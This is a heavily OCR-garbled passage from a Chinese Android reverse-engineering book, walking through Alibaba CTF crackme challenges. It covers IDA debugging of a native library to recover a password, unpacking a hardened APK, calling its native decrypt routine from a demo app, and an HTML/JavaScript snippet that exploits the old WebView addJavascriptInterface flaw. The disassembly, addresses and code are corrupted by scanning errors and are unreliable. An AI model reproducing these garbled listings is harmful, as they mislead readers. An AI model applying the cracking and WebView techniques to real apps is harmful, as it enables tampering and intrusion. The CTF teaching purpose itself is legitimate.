3) 找到 Java com yaotong crackme MainActivity securityCheck 函 数 的 绝对 地 址 。 


4) FE, кайат, Xt 


libcrackme .50:74FAF1A8 
libcrackme .so :74FAF1A8 
libcrackme.so:75FRF188 
libcrackme.so:7^FRF188 
libcrackme.so:7^FRF188 


libcrackme.so:75FRF1A8C 
ibcrackme.so:7^hFARF1B8 
libcrackme .so :74FAF1B4 
libcrackme.so:75FfF1B8 
libcrackme.so:75FRF1BC 
libcrackme.so:75FARF1C8 
libcrackme.so:75FARF1C^ 
libcrackme.so:7h5FARF1C8 
libcrackme.so:75FARF1CC 
libcrackme.so:7h5FfRF1D8 
libcrackme.so:75FARF1D^ 
libcrackme.so:75FfF1D8 
libcrackme.so:75FfF1DC 
libcrackme.so:7h5FfF1E8 
libcrackme.so:7h5FfRF1E^ 


ван, SH RH: 


Jaua com yaotong crackme HMainfictiuvityu securityCheck 


uar 28- 
uar 1С= 


这 里 可 以 单 步调 试 进 来 了 ,说明 修 改 反 调试 指令 


下 面 束 继续 用 F8 单 步调 试 ， 如 下 所 示 : 


libcrackme .50:74FAF2AC LDRB 
libcrackme.so:7h5FAaF2B8| CHF 
libcrackme.so:7hFARF2B^| BNE 
libcrackme.so:7^hFARF2B8 f 

libcrackme.so:7h5FARF2BC арр 
libcrackme.so:7hFAF2C8 MOU 
libcrackme.so:75FRF2C^h СМР 
libcrackme.so:7h5FARF2C8 BNE 
libcrackme.so:7h5FAF2CC B 


libcrackme.so:7h5FARF2D8 


调试 到 这 里 ， 友 现 一 个 问题 ， 束 是 CMP 指 令 
令 比较 的 应 该 就 是 输入 的 密码 和 正确 的 密码 。 册 次 重新 调试 ， 看 看 R3 和 R1 寄 存 器 的 值 ， 如 下 所 示 : 


libcrackme .50:74FAF2A8 LDRB 


- 8x28 
- Bx1C€ 


SUB SP, SP, #8 

HOU R5, R8 

LDR R8, -(unk 74FB3FBC - 8x7hFARF1C8) 

LDR R6, -8x2D^ 

HÜU Rh, R2 

ADD R8, PC, R8 ; unk_7Z4FB3FBC 

арр R8, R6, R8 

LDRB R8, [R8,tt(byute 74FB4359 - 8x75FB^5298)] 

CHP R8, #0 

BNE loc 74FAF214 

HOU R1, #2 

HOU RO, #7 

STR R1, [SP ,#0x28+var_20] 

STR R8, [SP,tt8x28*var 1С] 

LDR RO, -(unk 74FB3FBC - 8x7hFRF1FHA) 
R3, [R2] | K s pes 
R1, [R8] 这 里 我 们 在 调试 的 时 候 ， 发 现 
loc 7hFAF2D8 输入 一 个 密码 ， 调试 到 这 里 
is чн ab ' 就 直接 跳 过 去 了 ， 前 面 有 一 个 
R1, #1 СМР 指令 , 说明 这 里 很 有 可 能 
12^ Pararoad 是 比较 密码 的 地 方 ， 我 们 需要 


libcrackme.so:78FñF2D0 ; ----------------------- 


libcrackme.so:7h5FRF2D8 loc 75FRF2D8 


а, BNERB 


loc 74FAF 


令 就 开始 跳 转 到 loc_74FAF2D0 处 ， 那 么 就 可 以 猜 


4 再 一 次 进入 调试 ， 注 意 R3 和 和 


КІ 寄存 需 的 值 内 容 


; CODE XREF: Јауа com yag 


到 了 ，CMP 指 


libcrackme.so:7h5FRF2608 LDRB ВЗ, [BM] ` 


libcrackme.so:7h5FRF2RC LDRB 11, [Rt 
libcrackme.so:75FRF2B8 CHP R3, R1 [R2]-[1ib :kme .50: Unvind GetTextRelBase-*15] 
DCB 8x61 ; a 
libcrackme.so:7^5FRF2B8 ADD з , DCB 8x69 ; i 看 到 CMP 指令 比较 的 是 R3 寄存 器 ， 
libcrackme.so:75FRF2BC ADD R8, R8, DCB 60x79 ; у | - Е . 
libcrackme.so:7hFRF2C8 MOU R1, #1 осв OxóF ; o 先 看 R3 和 存 的 但是 采用 寄存 促 寻 址 方 
libcrackme .so0:74FAF2C4 CHP R3, #0 DCB 8x75 ; u 式 ， 看 到 是 一 个 字符 串 : aiyou,bucu, 
libcrackme.so:7h5FRF2C8 BNE loc 75FRDCB 8x2€ ; , 那么 R2 寄存 器 中 的 值 就 是 这 个 字符 
libcrackme.so:74FAF2CC B loc 74FADCB 8x62 ; b ; BL BH X zb A. =Z >r 
libcrackme.so:7hFAF2D8 ; ——-------------------- DCB 8x75 ; u REDE, Бехатар PERI 
libcrackme.so:7hFRF2D6 DCB 0x63 ; c 应 该 没 显示 完 ， 因 为 我 们 没 看 到 结 ? 
libcrackme.so:7h5FRF2D8 loc 75FRF2D8 DCB 80x75 ; и 字符 0 所 示 我 们 点 击 R2 进入 查看 | 
Tihonasasbma -c»7hE^5ronfi Hnil D4 нп 


XER STRANEM НЕМЕЕ XUUEIEERIERBJ, KERS ВЕЕ ЕЕ RA, AAA 
aiyouhttp://www.hzcourse.com/resource/readBook? 
path=/openresources/teach_ebook/uncompressed/17266/OEBPS/Text/.… 但 是 这 里 肯定 不 是 全 部 字符 串 ， 因 为 没 看 到 字符 
PAJAR: \0 ， 操 击 R2 寄 仔 器 ， 进 入 查看 完整 内 容 ， 如 下 所 示 : 

JL LIL EE dG 二 = LJ. 
libcrackme.so:75FB2458 DCB 8x61 
libcrackme.s0:75FB2551 DCB 8x69 
libcrackme.so:75FB2552 DCB 0x79 
libcrackme.so:75FB2453 DCB 8xóF 
libcrackme.so:75FB2455^4 DCB 80x75 
libcrackme.so:75FB25455 DCB 8x2C€ 
libcrackme.so:75FB2556 DCB 8x62 
libcrackme.s0:75FB24557 DCB 8x75 
libcrackme.s0:75FB254558 DCB 8x63 
libcrackme.so:75FB25459 DCB 8x75 
libcrackme.so:75FB2^5580 DCB ӨхбЕ 
libcrackme.s0:75FB2545B DCB 8x6F 
libcrackme.so:75FB255C€ DCB Ü 


这 里 是 全 部 内 容 aiyou，bucuoo。 继 续 查 看 R1 寄 存 器 的 内 容 ， 如 下 所 示 : 


| 
| 


| 


11һсгасКте . .s0:74FAF2A8 


LDRB 
libcrackme .so:74FAF2AC LDRB 
libcrackme.so:7AhFAF2BB8 СМР 
ЇФ_ libcrackme.so:74FAF2B4 BNE 
libcrackme .so:74FAF2B8 ADD R2, R2, Ж0СВ 
libcrackme .so:74FAF2BC ADD RB, RB, #DCB 
libcrackme.so:7h5FARF2C8 MOU R1, #1 DCE 
libcrackme .so:74FAF2C4 СМР R3, #0 DCB 
libcrackme.so:7A5FAF2C8 BNE loc 74FAF:DGB 
libcrackme.so:7&4FAF2CC B loc 74FAF:DGB 
libcrackme.so:7hFAF2D8 ; ----------------------- DCB 
libcrackme.so:74FAF2DO DCB 
libcrackme.so:75FRAF2D8 loc 74FAF2D8 DCB 
— libcrackme. so:7hFRF2D8 MOV R1, #0 DCB 


üxófi 


0х69 ; 


üxó1 


Ox6E ; 
0x67 ; 
üx?77 ; 


8x65 


8x69 
8 
0 


ТӨЄШҮҢЕЙЕ![В 8]=[ йеһид1л8 :760C50B8] 


i 这 里 的 比较 还 有 一 个 寄存 器 
;a АІ, И НАУРУ, 
‚п ар: Н, FE 
” ”保存 在 寄存 器 RO 中 ， 我 们 看 
; е 到 这 ПРАВЕ АПЕЙ АШ] _. 
IF: Java com yaot' 


= = == x= = = = = 


——— ———— — — 


， 那 么 到 这 


Congratulatic 


图 22-42 ”破解 成 功效 果 图 
提示 : 项 目下 载 地 址 为 


http://download.csdn.net/detail/jiangwei0910410003/9531957 


注意 : 时 刻 需 要 注意 BL/BLX 等 跳 转 指令 ， 在 它们 执行 
的 寄存 器 内 容 来 获取 重要 信息 。 


完 之 后 ， 肯 定 会 有 一 


225 ”本 章 小 结 
本 章 主 要 介绍 用 IDA 调 试 so 文件 ， 这 也 是 一 种 全 新 的 方式 去 破解 native 
JA, Ж 


解 。 1 2K pk E елп 2. ЖЕ 38 ЖОЛЫ s, 69 ç 


582358 PEMA 


层 的 代码 。 
么 可 以 使 用 Eclipse 调试 samli 文 件 去 破解 ; 如 果 程 序 把 关键 代码 放 到 native 层 ， 


这 个 赖 是 输入 的 内 


里 就 其 然 开 表 了 ， 密 码 是 上 面 的 ailyou，bucuoo; 再 次 输入 这 个 密码 ， 就 可 见 到 破解 成 功 。 如 图 22-42 所 示 。 


ons!!You Wini! 


些 CMP/CBZ 等 比较 指令 ， 这 时 候 就 可 以 查看 重要 


现在 有 些 程序 依然 把 关键 代码 放 在 了 Java 
那么 这 时 候 ， 可 以 使 用 IDA 来 调试 so 文件 去 破 


本 章 主要 介绍 如 何 应 对 Android 中 一 些 apk 加 固 的 安全 防护 ， 在 之 前 的 两 章 中 ， 可 以 看 到 一 个 是 针对 于 Java 层 的 逆向， 一 个 是 
针对 于 native 层 的 逆向 ， 还 没有 涉及 apk 的 加 固 ， 那 么 本 章 就 要 来 介绍 一 下 如 何 应 对 现在 市 场 中 一 些 加 固 apk 的 逆向 方法 ， 现 在 市 
场 中 加 固 apk 的 方式 有 两 种 : 一 种 是 对 源 apk 整 体 做 一 个 加 固 ， 放 到 指定 位 置 ， 运 行 的 时 候 再 解密 动态 加 载 ; 还 有 一 种 是 对 so 进行 
加 固 ， 在 so 加 载 内 存 的 时 候 进 行 解 窖 释放。 本章 主 要 介绍 第 一 种 加 固 方式 ， 就 是 对 apk 整 体 进行 加 固 。 


23.1 逆 癌 加 固 应 用 的 思路 


按照 逆向 惯例 ， 用 一 个 案例 来 分 析 讲 解 ， 这 次 依然 采用 的 是 阿里 的 CTF 比 赛 的 第 三 题 ， 如 图 23-1 所 示 。 


|вегаск 


图 23-1 破解 应 用 界面 


题目 是 : 要 求 输入 一 个 网 页 的 URL， 然 后 跳 转 到 这 个 页 面 ， 但 是 必须 要 求 弹 出 指定 内 容 的 Toast 提 示 ， 这 个 


了 解 到 题目 ， 融 来 简单 分 析 一 下 。 这 里 大 致 的 逻辑 应 该 是 ， 输 入 的 URL 会 传递 给 一 个 WebView 控 件 ， 进 行 展 示 网 页 。 如 果 


按照 题目 的 逻辑 的 话 ， 应 该 是 网 页 中 的 Javascript 会 调用 本 地 的 一 个 Java 方 法 ， 然 后 弹出 相应 的 提示 。 那 么 下 面 吕 开始 操作 。 


按照 之 前 的 破解 步 又 : 


第 一 步 : 先 用 解压 软件 解压 出 它 的 classes.dex 文 件 ， 然 后 使 用 dex2jar+jd-gui 查 看 Java 人 代码， 如 图 23-2 所 示 。 


LaBA A= ` A= 
£— T>, XT 


这 里 只 有 一 个 Application 类 ， 这 个 apk 可 能 被 加 固 了 ， 为 什么 这 么 说 呢 ?” 因 为 一 个 apk 加 固 ， 外 面 肯定 得 5v 
必须 是 自 定 义 的 Application 类 ， 它 需要 做 一 些 初 始 化 操作 ， 那 么 一 般 现 在 加 固 的 apk 壳 的 Application 类 都 喜欢 叫 
stubApplication。 这 里 可 以 看 到 ， 除 了 一 个 Application 类 ， 没 有 其 他 任何 类 了 ， 包 括 入 口 Activity 类 都 没有 了 ， 那 么 这 时 候 会 


RIL, TA RFT. 


5-8 com.ali.mobisecenhance 
日 - 国 StubApplication package com.ali.mobisecenhance; 
El--@ StubApplication 


public class StubApplication extends Application 
{ 
static 
[ 
System. loadLibrary ("mobisec™"); 


} 


private native void b(ClassLoader paramClassLoader, Context paramContext); 


protected native void attachBaseContext (Context paramContext); 


public native void опСгеате () ; 


图 23-2 ”应 用 的 classes.dex 文 件 


第 二 步 : 会 使 用 Apktool 工 具 进 行 apk 的 有 反 编 译 ， 得 到 apk 的 AndroidManifest.xml 和 资源 内 容 ， 如 下 所 示 : 


<?xml version="1.0" encoding- 'utf-8" 2 T d 应 用 的 包 名 
«manifest packaged" '| android:versionCode-"1" android:versionName 
ulns:androide http: ла сы. conf ank]/res/amiroid*5 
«uses-permission android:name-"android.permission.INTERNET" /» 
«uses-permission android:name-"android.permission.ACCESS NETWORK STATE" /» 
«uses-permission android:name-"android.permission.WRITE EXTERNAL STORAGE" /» 
«application android:theme-"Qstyle/AppTheme" android:label-"gstring/app name" 


ic launcher" android:name-|'com.ali.mobisecenhance.StubApplication" |апаго1а: деб 


allowBackup-"true"» 
«activity android:label-"Gstring/app name" android: namd-" .MainActivity"p 
«intent-filter» 
«action android:name-"android.intent.action.MAIN" /» 
«category android:name-"android.intent.category.LAUNCHER" /» 
«/intent-filter» 
activity» — NEM 入 口 的 Activity 
<activity android:name=".WebViewActivity" /> 
</application> 
</manifest> 


反 编 译 之 后 ， 看 到 程序 会 有 一 个 入 口 的 Activity， 就 是 MainActivity 类 ， 记 住 一 点 ， 不 管 最 后 的 apk 如 何 加 固 ， 即 使 看 不 到 
代码 中 的 四 大 组 件 的 定义 ， 也 肯定 会 在 AndroidManifest.xml 中 声明 ， 因 为 如 果 不 声 明 的 话 ， 运 行 是 会 报错 的 。 这 里 还 是 没 发 现 
入 口 Activity 类 ， 而 且 知 道 它 肯 定 是 放 在 本 地 的 一 个 地 方 ， 因 为 需要 解密 动态 加 载 ， 所 以 不 可 能 是 放 在 网 上 的 ， 衣 定 是 本 地 。 


这 里 的 技巧 如 下 : 当 友 现 apk 中 主要 的 类 都 没有 了 ， 肯 定 是 apk 被 加 固 了 ， 加 固 的 源 程 序 肯 定 是 在 本 地 ， 一 般 会 有 这 么 几 个 
地 万 需要 注意 的 : 


“ 应 用 程序 的 assets 目 录 ， 知 道 这 个 目录 是 不 参与 a4pk 的 资源 编译 过 程 的 ， 所 以 很 多 加 固 的 应 用 喜欢 把 加 响 之 后 的 源 apk 放 到 这 


把 源 apk 加 密 放 到 这 的 dex 文 件 的 尾部 ， 这 个 方式 肯定 不 是 本 文 的 案例 ， 但 是 也 有 这 样 的 加 固 方 式 ， 遇 到 这 种 加 固 方式 会 导 
致 用 dex2jatr 工 具 解 析 dex 失 败 ， 这 时 候 就 知道 了 ， 肯 定 对 dex 做 了 手脚 。 


“ 把 源 apk 加 密 放 到 so 文件 中 ， 这 就 比较 难 了 ， 一 般 都 是 把 源 apk 进 行 拆 分 ， 存 到 so 文件 中 ， 分 析 难 度 会 加 大 的 。 
一 般 都 是 这 三 个 地 方 。 记 住 一 操 ,不 管 源 apk 被 拆 分 ， 被 加 密 了 ， 被 放 到 哪 了 ， 只 要 是 在 本 地 ， 都 有 办 法 得 到 它 。 


按照 这 上 面 的 三 个 思路 来 分 析 一 下 ， 这 个 apk 中 加 固 的 源 apk 放 在 哪 了 ? 通过 刚刚 的 dex 文 件 分 析 ， 友 现 第 二 种 方式 肯定 不 
可 能 ， 那 么 会 放 在 assets 目 录 中 吗 ? 查看 assets 目 录 ， 如 图 23-3 所 示 。 


名 称 v 修改 日 期 — xm 大 小 


clsjar 2016/6/6 ... Executabl... 178 KB 
fak.jar 2016/6/6 ... Executabl... 1КВ 


23-3 № JH f'Jassets A Ж 


assets 目 录 中 的 确 有 两 个 jar 文 件 ， 而 且 第 一 反应 是 使 用 jd-gui 来 查看 jar， 可 惜 的 是 打开 失败 ， 所 以 猜想 这 个 jar 是 经 过 处 理 
了 ， 应 该 是 加 密 ， 这 里 很 有 可 能 是 存放 源 apk 的 地 方 。 但 是 上 面 也 说 了 还 有 第 三 种 方式 ， 去 看 看 libs 目 录 中 的 so 文件 ， 如 图 23-4 


Ете 
名 称 修改 日 期 
| | libhack.so 2016/6/6 ... 


| | libmobisec.so 2016/6/6 ... 
| | libtranslate.so 2016/6/6 ... 


图 23-4 ”应 用 的 libs 目 录 


这 里 有 三 个 so 文件 ， 而 上 面 的 Application 中 加 载 的 只 有 一 个 so 文件 : libmobisec.so， 那 么 其 他 的 两 个 so 文件 很 有 可 能 是 拆 
分 apk 文 件 的 藏身 之 处 。 


通过 上 面 的 分 析 之 后 ， 大 致知 道 了 两 个 地 方 很 有 可 能 是 源 apk 的 藏身 之 处 ， 一 个 是 assets 目 录 ， 一 个 是 libs 目 录 。 那 么 分 析 
完了 之 后 友 现 现在 面临 两 个 问题 : 


assets 目 录 中 的 jat 文 件 被 处 理 了 ， 打 不 开 ， 也 不 知道 处 理 逻 辑 。 
. libs 目 录 中 的 三 个 so 文件 ， 唯 一 加 载 了 libmobisec.so 文 件 了 。 


这 里 现在 的 唯一 入 口 束 是 这 个 libmobisec.so 文 件 ， 因 为 上 层 的 代码 没有 ， 没 法 分 析 ， 下 面 来 看 一 下 so 文件 ， 如 图 23-5 所 
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Functions window 


Function name " 
f| sub 24C74 

sub 24CAO 

sub. 24CDO r 
sub 24D48 

.JNIEnv:DeleteLocalRef( jobject *) 
.JNIEnv::NewObject( jclass *, jmethodID *....) 
.JNIEnv::GetObjectClass( jobject *) 
.JNIEnv::GetMethodID( jclass *,char const*,char const*) 
.JNIEnv::CallObjectMethod( jobject *, jmethodID *....) 
.JNIEnv::CallIntMethod( jobject *, jmethodID *....) 
.JNIEnvz:CallVoidMethod( jobject *, jmethodID *,...) 
.JNIEnvz:CallNonvirtualVoidMethod( jobject *, jclass *, jme 
.JNIEnv::GetObjectField( jobject *, jfieldID *) 
.JNIEnv:SetObjectRield( jobject *, jfieldID *, jobject *) 
.JNIEnv::CallStaticObjectMethod( jclass *, jmethodID *....) 
.JNIEnv::NewStringUTF(char const*) 

sub 24E50 

std:priv: ucopy trivial(void const*,void const* void *) 

JNI OnLoad 

stdz:privz String base «char,stdzallocator «char» >: M dea 
std::priv: String base«char,stdzallocator «char» >: M allo 


I| | D E I| o B ia I 


图 23-5 so 中 的 函数 列表 


这 里 没有 特殊 的 方法 ， 比 如 Java_ 开头 的 万 法 ， 所 以 猜测 这 里 应 该 是 目 己 注册 了 native 方 法 ， 混 淆 了 native 方 法 名 称 。 那 么 
到 这 里 ， 会 友 现 遇 到 的 问题 用 现 阶段 的 扩 林 是 没 法 解决 了 。 


234 [n]; 


下 面 就 来 分 析 一 下 如 何 解决 上 面 的 问题 。 其 实 解 决 这 个 问题 现 有 的 方法 大 多 了 。 
第 一 种 方法 : 修改 smali 源 码 。 


把 上 面 的 那个 Java Script 对 象 名 称 改 成 自己 想 要 的 ， 比 如 jiangwei， 然 后 在 自己 编写 的 页 面 中 直接 调用 
jiangwei.showToast 方 法 即 可 。 不 过 这 里 需要 修改 smali 源 码 ， 使 用 smali 工 具 回 编译 成 dex 文 件 ， 再 返回 到 apk 中 运行 。 方 法 是 


可 行 的 ， 但 是 感觉 太 复 杂 ， 这 里 不 采用 。 
第 二 种 方法 : 利用 WebView 的 漏洞 。 


直接 使 用 如 下 Java Script 代码 即 可 。 


«html» 
«head» 
«meta http-equiv-"Content-Type" content-"text/html; charset-UTF-8"» 
«script» 
function findobj()1 
for (var obj in window) { 
if ("getClass" in window[obj]) 1 
return window| ob; | 
上 
} 
</script> 
</head> 
<body> 
hellowrold! 
«script type-"text/javascript"» 
var obj - no () 
</script> 
</body> 
</html> 


这 里 根本 不 需要 任何 Javascript 对 象 的 名 称 ， 只 需要 方法 名 融 可 以 完成 调用 。 可 以 看 到 这 个 漏洞 还 是 很 危险 的 。 
第 三 种 方法 : 调用 加 密 方 法 。 


看 到 了 那个 加 密 方法 ， 自 己 写 一 个 程序 ， 来 调用 这 个 方法 ， 既 然 上 面 已 经 得 到 正确 的 JavaScript 对 象 名 称 ， 这 里 就 采用 这 种 
方式 。 因 为 这 个 方式 有 一 个 新 的 技能 ， 所 以 这 里 就 讲解 一 下 了 。 


如 果 用 第 三 种 方法 的 话 ， 融 需要 再 去 分 析 那 个 加 密 方法 逻辑 了 : 


const-string v4, "BQ1S*[w6G_" 

const/4 v5, 0х2 

invoke-static (v4, v5), Landroid/support/v4/widget/ListViewAutoScrollHelpern;- 
»decrypt native(Ljava/lang/String;I)Ljava/lang/String; 


android.support.v4.widget.ListViewAutosScrollHelpern 在 这 个 类 中 ， 有 再 去 查找 这 个 smali 源 码 : 


# direct method 
-Method static constructor «clinit»()V 
.registers 1 


CECOT- VOLO 加 载 了 libtramslate.so 文件 
.end method 


.method public constructor «init»()V 
.registers 1 


invoke-direct {p0}, Ljava/lang/Object;-»«init»()V 


return-void 


.end method M 
.method public static |native decrypt nativel|l(Ljava/lang/String;I)Ljava/lang/ 
String: 


这 个 类 加 载 了 libtranslate.so 库 ， 而 且 加 密 方法 是 native 层 的 ， 那 么 用 IDA 碍 看 libtranslate.so 库 ， 如 图 23-17 所 示 。 


Java_com_example_apktest_methodClass_translateDouble( JNIEnv *, j 
Java com example apktest methodClass translateFloat( JNIEnv *, Jo 
Java com example apktest methodClass translateLong( JNIEnv *, jot 
Java com example apktest methodClass translateInt( JNIEnv *, jobje 
Java com example apktest methodClass translateShort( JNIEnv *, jo 
Java com example apktest methodClass translateChar( JNIEnv *, jo 
Java com example apktest methodClass translateByte( JNIEnv *, job 
Java com example apktest methodClass translateBoolean( JNIEnv *, 
Java com example apktest methodClass translateObject( JNIEnv *, i 
Java com example apktest methodClass translateVoid( JNIEnv *, job 


РА 
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搜 一 下 Java 开 头 的 国 数 ， 友 现 并 没有 和 decrypt_native 方 法 对 应 的 native 国 数 ， 说 明 这 里 做 了 native 方 法 的 注册 混 消 ， 直 接 
&JNI OnLoad 函 数 ， 如 下 所 示 : 


-text: 00002688 EXPORT JHI OnLoad 
-text -00002688 JHI OnLoad 

-text -00002688 

.-text:88882688 var С = -ÜBxt€ 


.text:88882688 


.text:08802688 MOUS R3, #0 

.text:88882688 PUSH (R8,R1,R54,LR? 

.text:808880268C STR R3, [SP,ttüx18*var С] 

.text:08880268E LDR R3, [R8] 

.text:08002698 ADD R1, SP, #8x18+var_C 

.text:00882692 LDR R2, =0x10004 Register Native РК 

.text: 800802695 LDR R3, [R3,#0x18] 

.text:08802696 BLX R3 

.text: 88802698 C HP R8, H6 

-text :006008269 BNE >ч  26B2 

.text:80880269C LDR » [SP,tstüx18*var С] 

.Ltext:808880269E : 

-text: 808088026808  218register filgorithmP7 JNIEnu register fllgorithm( JNIEnu *) 
.text:08802680^ R8, R4 

.text:8888268R6  2e18register translateP7 JNIEnu register translate( JNIEnu *) 
.text:8888026Rnf ВМР њат 

.text:8088826RC BLT locret 26B6 

.text:888826RE LDR R8, =0x10004 

.text:80808826B8 B locret 26B6 


这 里 果然 是 自己 注册 了 native 国 数 ， 但 是 分 析 到 这 里 ， 惑 不 往 下 分 析 了 ， 为 什么 呢 ?” 因 为 其 实 没 必 要 摘 清 楚 native 层 的 国 数 
功能 ， 知 道 了 Java 层 的 native 方 法 定义 ， 那 么 可 以 自己 定义 一 个 native 方 法 来 调用 libtranslate.so 中 的 加 密 阔 数 功能 ， 如 图 23-18 
所 示 。 


Z WebViewSo 

4 (38 src 
b ДВ android.support.v4.app 
b ш android. —— view 


Ь ү: stViewhutoScrolHelpern java 


b qn MainActivity. java 
‚ 8 gen [Generated Java Files] 
mà Android 6.0 
Eh Android Private Libraries 
‚ Bà Android Dependencies 


= 3 libhack.so 
m пі libmobisecso 


图 23-18 Demo r4£ 


新 建 一 个 Demo 工 程 ， 仿 造 一 个 ListViewAutoScrollHelpern 类 ， 内 部 再 定义 一 个 native 方 法 。 


J) ListViewAutoScrollHelpern.java 23 | 


— 1 package android.support.v4.widget; 
2 
public class ListViewAutoScrollHelpern í 


3 
4 
5 public static native String decrypt native(String str, int index); 
6 
7 


然后 在 MainActivity 中 加 载 libtranslate.so: 


xi 
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然后 调用 那个 native 方 法 ， 打 印 结果 如 下 : 


String val = ListViewAutoScrollHelpern.decrypt native("BQ1$*[w6G ", 2); 
Log.i("jw", "val:"-val); 


这 里 的 方法 参数 可 以 查看 smali 源 码 中 的 那个 方法 参数 : 


const-string v4, "BQ1S*[w6G " 


const/4 v5, 0х2 


invoke-static (v4,v5),Landroid/support/v4/widget/ListViewAutoscrollHelpern;- 
»decrypt native(L 


忌 击 运行 ， 发 现 有 朋 演 的， 查看 log 人 信息， 如 下 所 示 : 


dalvikvm in Ljava/lang/Runtime;.nativeLoad: (Ljava/lang/String;Ljava/lang/ D 
ClassLoader;Ljava/lang/String;)Ljava/lang/String; (RegisterNatives) 

dalvikvm Pending exception is: 

dalvikvm java.lang.NoClassDefFoundError: android/support/v4/view/PagerTitleStripIcsn 

dalvikvm at java.lang.Runtime.nativeLoad (Native Method) 

dalvikvm at java.lang.Runtime.doLoad (Runtime. ]java:421) 

dalvikvm at java.lang.Runtime.loadLibrary (Runtime.java:362) 

dalvikvm at java.lang.System.loadLibrary (System.java:526) 

dalvikvm at cn.wjdiankong.webviewso.MainActivity.«clinit» (MainActivity.java:11) 

dalvikvm at java.lang.Class.newInstanceImpl (Native Method) 

dalvikvm at java.lang.Class.newInstance (Class.java:1208) 


是 由 于 libtranslate.so 中 有 一 个 PagerTitleStriplcsn 类 找 不 到 ， 这 个 类 应 该 也 有 一 个 native 方 法 ， 再 构造 这 个 类 


public class PagerTitleStripIcsn í 


public static native String decrypt_native(String str, int index); 


再 次 运行 ， 还 是 报错 ， 原 因 差 不 多 ， 还 需要 再 构造 一 个 类 TaskSstackBuilderJellybeann: 


public 
public 
public 
public 
public 
public 
public 
public 
public 
public 


static 
static 
static 
static 
static 
static 
static 
static 
static 
static 


native 
native 
native 
native 
native 
native 
native 
native 
native 
native 


import java.util.ArrayLlist; 


public class TaskStackBuilderJellybeann { 


void translateVoid(String str, Object obj, ArrayList list); 
Object translateObject(String str, Object obj, ArrayList list); 
boolean translateBoolean(String str,Object obj, ArrayList list); 
double translateDouble(String str, Object obj, ArrayList list); 
float translateFloat(String str, Object obj, ArrayList list); 
short translateShort(String str, Object obj, ArrayList list); 
int translateInt(String str, Object obj, ArrayList list); 

long translatelong(String str, Object obj, ArrayList list); 


FT, BOXED: 


/cn.wjdiankong.webivewso I/jw: val:SmokeyBear 


成 功 了 ， 从 这 个 log 信 息 可 以 看 出 来 ， 解 密 之 后 的 Java Script 对 象 名 称 是 : SmokeyBear， 那 么 下 面 就 简单 了 ， 再 构造 一 个 
URL 页 面 ， 直 接 调 用 SmokeyBear.showToast 即 可 。 


这 还 是 很 不 安 
全 的 。 如 何 防 止 自 己 的 so 被 别人 调用 呢 ? 在 前 面 草 节 中 已 经 讲解 了 安全 防护 的 知识 ， 可 以 在 so 中 的 native 函 数 做 一 个 应 用 的 签名 
校 验 ， 只 有 属于 目 己 的 签名 应 用 才能 调用 ， 否 则 直接 退出 。 


注意 : 这 里 如 果 知 道 了 Java 层 的 native 方 法 的 定义 ， 那 么 就 可 以 调用 这 个 native 方 法 来 获取 hative 层 的 函数 功能 ， 


23.6 逆 辐 加固 应 用 的 万 法 总 结 


破解 的 步骤 比较 多 ， 下 面 来 整理 一 下 破解 步骤 。 


按照 破解 惯例 ， 首 先 解压 出 classses.dex 文 件 ， 使 用 dex2jar 工 具 查 看 java 代码， 发 现 只 有 一 个 Application 类 ， 所 以 猜测 
арке (加 固 ) 了 ， 然 后 用 apktool 来 反 编 译 apk， 得 到 它 的 资源 文件 和 AndroidManifest.xml| 内 容 ， 找 到 了 包 名 和 人 入口 的 
Activity 类 。 
2. 加 固 apk 的 源 程 序 一 般 存放 的 位 置 


LL ~ Е 


知道 加 固 apk 后 ， 那 么 就 分 析 这 个 加 固 的 apk 放 在 哪里 ， 肯 定 是 存放 在 本 地 的 一 个 地 方 ， 一 般 是 三 个 地 方 : 
- 应 用 的 asset 目 录 中 。 

- 应 用 的 libs 中 的 so 文件 中 。 

` 应 用 的 dex 文 件 的 末尾 。 


分 析 了 之 后 ， 友 现 asset 目 录 中 的 确 有 两 个 jar 文 件 ， 但 是 打 不 开 ， 猜 测 是 经 过 处 理 了 ， 所 以 得 分 析 处 理 逻 辑 ， 但 是 这 时 候 也 


SARB, GADE? XB SEIEBIT dump dekr: 不 管 最 后 的 源 apk 放 在 哪里 ， 最 后 都 是 需要 经 历 解密 动态 
加 载 到 内 和 存 中 的 ， 所 以 分 析 旗 层 加 载 dex 源 码 ， 知 道 有 一 个 国 数 dvmDexFileOpenPartial， 这 个 轴 数 有 两 个 重要 参数 ， 一 个 是 
dex 的 地 址 ， 一 个 是 dex 的 大 小 ， 而 且 台 道 这 个 冰 数 是 在 libdvm.so 中 的 。 所 以 可 以 使 用 IDA 进 行动 态 调试 获取 信息 。 


3. 双 开 1DA 开 始 获 取 内 存 中 的 dex 内 容 


双开 IDA， 用 之 前 的 动态 破解 so 方式 ， 来 给 dvmDexFileOpenPartial 函 数 下 断 点 ， 获 取 两 个 参数 的 值 ， 然 后 使 用 一 段 脚本 ， 
将 内 存 中 的 dex 数 据 保存 到 本 地 磁盘 中 。 


4. 分 析 获 取 到 的 dex 内 容 


得 天 了 内 存 中 的 dex 之 后 ， 使 用 dex2jar 工 具 去 查看 源码 ， 但 是 友 现 无 法 保存 ， 以 为 是 dump 出 来 的 dex 格 式 有 问题 ， 但 是 最 
后 使 用 baksmali 了 工具 进行 处 理 ， 得 到 smali 源 码 是 可 以 的 ， 然 后 就 开始 分 析 smali 源 码 。 


5. 分 析 源 码 了 解 破解 思路 


通过 分 析 源 码 得 天 ， 企 WebViewActivity 页 面 中 会 加 载 一 个 页 面 ， 然 后 那个 页 面 中 的 Javascript 会 调用 本 地 的 Java 对 象 中 的 
一 个 方法 来 展示 toast 信 息 。 但 是 这 里 遇 到 了 个 问题 : JavaScript 的 Java 对 象 名 称 被 混淆 加 密 了 ， 需 要 去 分 析 那 个 加 密 函 数 ， 但 
是 这 个 加 密 函数 是 native 的 ， 然 后 就 是 用 IDA 去 静态 分 析 了 这 个 native 函 数 ， 但 是 没有 分 析 完 成 ， 因 为 不 需要 ， 其 实 很 简单 ， 只 
需要 结果 ， 不 需要 过 程 。 现 在 解密 的 内 容 知 道 了 ，native 方 法 的 定义 也 知道 了 ， 那 么 就 去 写 一 个 简单 的 demo 去 调用 这 个 so 的 
native 方 法 即 可 ， 结 果 成 功 了 ， 得 天 了 正确 的 JavaScript 对 象 名 称 。 


6. 了 解 WebView 的 安全 性 


WebView 的 早期 版 本 的 一 个 漏洞 信息 ， 在 Android 4.2 之 前 的 版 本 WebView 有 一 个 漏洞 ， 就 是 可 以 执行 Java 对 象 中 所 有 的 
